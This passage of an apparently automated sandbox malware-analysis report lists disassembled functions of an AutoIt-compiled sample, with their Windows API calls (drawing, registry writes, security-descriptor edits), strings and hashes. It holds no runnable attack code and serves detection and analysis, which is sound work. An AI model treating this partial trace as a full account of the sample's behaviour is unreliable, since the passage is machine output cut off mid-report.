                                                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DE74CE
                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00DE74DB
                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DE752A
                                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00DE7554
                                                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00DE7572
                                                                                                            • DrawFocusRect.USER32(?,?), ref: 00DE757D
                                                                                                            • GetSysColor.USER32(00000011), ref: 00DE758E
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00DE7596
                                                                                                            • DrawTextW.USER32(?,00DE70F5,000000FF,?,00000000), ref: 00DE75A8
                                                                                                            • SelectObject.GDI32(?,?), ref: 00DE75BF
                                                                                                            • DeleteObject.GDI32(?), ref: 00DE75CA
                                                                                                            • SelectObject.GDI32(?,?), ref: 00DE75D0
                                                                                                            • DeleteObject.GDI32(?), ref: 00DE75D5
                                                                                                            • SetTextColor.GDI32(?,?), ref: 00DE75DB
                                                                                                            • SetBkColor.GDI32(?,?), ref: 00DE75E5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                            • String ID:
                                                                                                            • API String ID: 1996641542-0
                                                                                                            • Opcode ID: 2af91cacdbe53c85f7b995f882c3b00764339871c42259c8738275c25e405bb9
                                                                                                            • Instruction ID: 5e07a09daafb8d9fc3541932f2e89ddc7277444b713d4f67820a2d6a11febf69
                                                                                                            • Opcode Fuzzy Hash: 2af91cacdbe53c85f7b995f882c3b00764339871c42259c8738275c25e405bb9
                                                                                                            • Instruction Fuzzy Hash: DE616C72900358AFDF01AFA4DC89EAEBFB9EB08320F155115F915EB2A1D7709941DFA0
                                                                                                            Function 00DE0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCursorPos.USER32(?), ref: 00DE1128
                                                                                                            • GetDesktopWindow.USER32 ref: 00DE113D
                                                                                                            • GetWindowRect.USER32(00000000), ref: 00DE1144
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00DE1199
                                                                                                            • DestroyWindow.USER32(?), ref: 00DE11B9
                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00DE11ED
                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DE120B
                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DE121D
                                                                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 00DE1232
                                                                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00DE1245
                                                                                                            • IsWindowVisible.USER32(00000000), ref: 00DE12A1
                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00DE12BC
                                                                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00DE12D0
                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00DE12E8
                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00DE130E
                                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00DE1328
                                                                                                            • CopyRect.USER32(?,?), ref: 00DE133F
                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 00DE13AA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                            • String ID: ($0$tooltips_class32
                                                                                                            • API String ID: 698492251-4156429822
                                                                                                            • Opcode ID: 89e124cf4b17560030bf92cef19304b24139dfe40470dfbd50cf73780ac4a1eb
                                                                                                            • Instruction ID: 975eb0a8ef27ff3eb7ee3b019bb636f7b4aaaf0496d227da7930439ce085f6eb
                                                                                                            • Opcode Fuzzy Hash: 89e124cf4b17560030bf92cef19304b24139dfe40470dfbd50cf73780ac4a1eb
                                                                                                            • Instruction Fuzzy Hash: 98B18971604381AFDB14EF65C885B6ABBE4FF84350F04891CF9999B2A1D731E845CBA2
                                                                                                            Function 00D68891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D68968
                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00D68970
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D6899B
                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00D689A3
                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00D689C8
                                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D689E5
                                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D689F5
                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D68A28
                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D68A3C
                                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00D68A5A
                                                                                                            • GetStockObject.GDI32(00000011), ref: 00D68A76
                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D68A81
                                                                                                              • Part of subcall function 00D6912D: GetCursorPos.USER32(?), ref: 00D69141
                                                                                                              • Part of subcall function 00D6912D: ScreenToClient.USER32(00000000,?), ref: 00D6915E
                                                                                                              • Part of subcall function 00D6912D: GetAsyncKeyState.USER32(00000001), ref: 00D69183
                                                                                                              • Part of subcall function 00D6912D: GetAsyncKeyState.USER32(00000002), ref: 00D6919D
                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,00D690FC), ref: 00D68AA8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                            • String ID: AutoIt v3 GUI
                                                                                                            • API String ID: 1458621304-248962490
                                                                                                            • Opcode ID: 4bef253f034a4c4b8acef6ea2f2dbd44c10ad89568c17d28a8f78cc185c9c690
                                                                                                            • Instruction ID: 0d77b372f3a29a1545c38ef851804961c0362e6c847d5e93ca1ebdb4c2e37230
                                                                                                            • Opcode Fuzzy Hash: 4bef253f034a4c4b8acef6ea2f2dbd44c10ad89568c17d28a8f78cc185c9c690
                                                                                                            • Instruction Fuzzy Hash: 04B14971A00209DFDB14DFA8DC85BAA7BB5FB48314F184229FA15EB290DB74E941CF61
                                                                                                            Function 00DB0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DB10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DB1114
                                                                                                              • Part of subcall function 00DB10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1120
                                                                                                              • Part of subcall function 00DB10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB112F
                                                                                                              • Part of subcall function 00DB10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1136
                                                                                                              • Part of subcall function 00DB10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DB114D
                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DB0DF5
                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DB0E29
                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00DB0E40
                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00DB0E7A
                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DB0E96
                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00DB0EAD
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DB0EB5
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00DB0EBC
                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DB0EDD
                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00DB0EE4
                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DB0F13
                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DB0F35
                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DB0F47
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0F6E
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00DB0F75
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0F7E
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00DB0F85
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0F8E
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00DB0F95
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00DB0FA1
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00DB0FA8
                                                                                                              • Part of subcall function 00DB1193: GetProcessHeap.KERNEL32(00000008,00DB0BB1,?,00000000,?,00DB0BB1,?), ref: 00DB11A1
                                                                                                              • Part of subcall function 00DB1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00DB0BB1,?), ref: 00DB11A8
                                                                                                              • Part of subcall function 00DB1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DB0BB1,?), ref: 00DB11B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 4175595110-0
                                                                                                            • Opcode ID: f0f107197e312bd5b257b7774384528c8d8d77879b9b51c7ce04d337fd20f209
                                                                                                            • Instruction ID: 400a8d99782d6bc8b305448e014f451f80147dc668c1e48ad5ab68e9a43a3795
                                                                                                            • Opcode Fuzzy Hash: f0f107197e312bd5b257b7774384528c8d8d77879b9b51c7ce04d337fd20f209
                                                                                                            • Instruction Fuzzy Hash: 03713C71A0430AEBDB209FA4DC45BEFBBB8BF09350F184155F91AE6251D7719905CB70
                                                                                                            Function 00DDC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DDC4BD
                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00DECC08,00000000,?,00000000,?,?), ref: 00DDC544
                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00DDC5A4
                                                                                                            • _wcslen.LIBCMT ref: 00DDC5F4
                                                                                                            • _wcslen.LIBCMT ref: 00DDC66F
                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00DDC6B2
                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00DDC7C1
                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00DDC84D
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00DDC881
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00DDC88E
                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00DDC960
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                            • API String ID: 9721498-966354055
                                                                                                            • Opcode ID: 2fa0cea81e55cdde71ae10633ad9ea1f3331e6ed7c2f860c0aa045861e1edba7
                                                                                                            • Instruction ID: 859e216c1dc3ee4c9e516cead424e6f3e834ee7006bf65ee7169d4f19077a3eb
                                                                                                            • Opcode Fuzzy Hash: 2fa0cea81e55cdde71ae10633ad9ea1f3331e6ed7c2f860c0aa045861e1edba7
                                                                                                            • Instruction Fuzzy Hash: 481268356142019FDB14DF14C891E2AB7E5EF88725F18885DF88A9B3A2DB31FC45CBA1
                                                                                                            Function 00DE091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00DE09C6
                                                                                                            • _wcslen.LIBCMT ref: 00DE0A01
                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DE0A54
                                                                                                            • _wcslen.LIBCMT ref: 00DE0A8A
                                                                                                            • _wcslen.LIBCMT ref: 00DE0B06
                                                                                                            • _wcslen.LIBCMT ref: 00DE0B81
                                                                                                              • Part of subcall function 00D6F9F2: _wcslen.LIBCMT ref: 00D6F9FD
                                                                                                              • Part of subcall function 00DB2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DB2BFA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                            • API String ID: 1103490817-4258414348
                                                                                                            • Opcode ID: d5662bda753f13d697b48a2c4cd1d4a911d9fb49c1f517814fbf21e096387304
                                                                                                            • Instruction ID: a940261031210e2802a837dd760f0c63977fa025990ed5da48b57e706ca30381
                                                                                                            • Opcode Fuzzy Hash: d5662bda753f13d697b48a2c4cd1d4a911d9fb49c1f517814fbf21e096387304
                                                                                                            • Instruction Fuzzy Hash: 58E1AE312087818FCB14EF25C45196ABBE1FF98314B18895DF896AB362D770ED85CBB1
                                                                                                            Function 00DDC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                            • API String ID: 1256254125-909552448
                                                                                                            • Opcode ID: 776c782057da52feda84552c75ad20d10b4a92d9d83111ec164f6c6c494e87b8
                                                                                                            • Instruction ID: d9a6b57e1e77be1e2f893d0cf74ff46de12344e76285bd364940db5d9d81afe6
                                                                                                            • Opcode Fuzzy Hash: 776c782057da52feda84552c75ad20d10b4a92d9d83111ec164f6c6c494e87b8
                                                                                                            • Instruction Fuzzy Hash: AC71D53262056B8BCB20DE6CCD515BE33A1ABA0754F19252BFC95A7384E631CD85C7B0
                                                                                                            Function 00DE833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00DE835A
                                                                                                            • _wcslen.LIBCMT ref: 00DE836E
                                                                                                            • _wcslen.LIBCMT ref: 00DE8391
                                                                                                            • _wcslen.LIBCMT ref: 00DE83B4
                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00DE83F2
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00DE361A,?), ref: 00DE844E
                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DE8487
                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00DE84CA
                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DE8501
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00DE850D
                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DE851D
                                                                                                            • DestroyIcon.USER32(?), ref: 00DE852C
                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DE8549
                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DE8555
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                            • String ID: .dll$.exe$.icl
                                                                                                            • API String ID: 799131459-1154884017
                                                                                                            • Opcode ID: 8bde118d8c1c19b4ec64747a4854570b9039fa660f9b99ac6deccc17ecd3be33
                                                                                                            • Instruction ID: 72595e7b58b654cddaa654bad388957887a496b921aa3e90f041af0b3d045eac
                                                                                                            • Opcode Fuzzy Hash: 8bde118d8c1c19b4ec64747a4854570b9039fa660f9b99ac6deccc17ecd3be33
                                                                                                            • Instruction Fuzzy Hash: 1561CE71540745BAEB14EF65CC81BBE77A8FB04B21F104609F919EA1D1EF74A980DBB0
                                                                                                            Function 00D57778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                            • API String ID: 0-1645009161
                                                                                                            • Opcode ID: e3a7e702dab6e65170fc476126e70a1e0e725db6debdcd0b61ab790da883bf36
                                                                                                            • Instruction ID: 9321446d3bade7f7f509917f995ae808591408aa9ec44d4dc25b6ad9af8b6762
                                                                                                            • Opcode Fuzzy Hash: e3a7e702dab6e65170fc476126e70a1e0e725db6debdcd0b61ab790da883bf36
                                                                                                            • Instruction Fuzzy Hash: 23811971A40605BBDF11AF60FC42FAE37A4EF15301F244024FC05AA196EB71DA19C7B1
                                                                                                            Function 00DB5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadIconW.USER32(00000063), ref: 00DB5A2E
                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00DB5A40
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00DB5A57
                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00DB5A6C
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00DB5A72
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00DB5A82
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00DB5A88
                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00DB5AA9
                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00DB5AC3
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00DB5ACC
                                                                                                            • _wcslen.LIBCMT ref: 00DB5B33
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00DB5B6F
                                                                                                            • GetDesktopWindow.USER32 ref: 00DB5B75
                                                                                                            • GetWindowRect.USER32(00000000), ref: 00DB5B7C
                                                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00DB5BD3
                                                                                                            • GetClientRect.USER32(?,?), ref: 00DB5BE0
                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 00DB5C05
                                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00DB5C2F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 895679908-0
                                                                                                            • Opcode ID: fdf17654ef31956a67365058dbbcb20e5fb294207b8718726852aed950ab28d1
                                                                                                            • Instruction ID: 1b40c2f44feb6ac415a174b5a515e8ec2c49d6f22a8a6d1083b38ea42b11f207
                                                                                                            • Opcode Fuzzy Hash: fdf17654ef31956a67365058dbbcb20e5fb294207b8718726852aed950ab28d1
                                                                                                            • Instruction Fuzzy Hash: D4717C31900B05EFDB20EFA8DE85BAEBBF5FF48704F144518E586A66A4D771E940CB24
                                                                                                            Function 00DB30F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
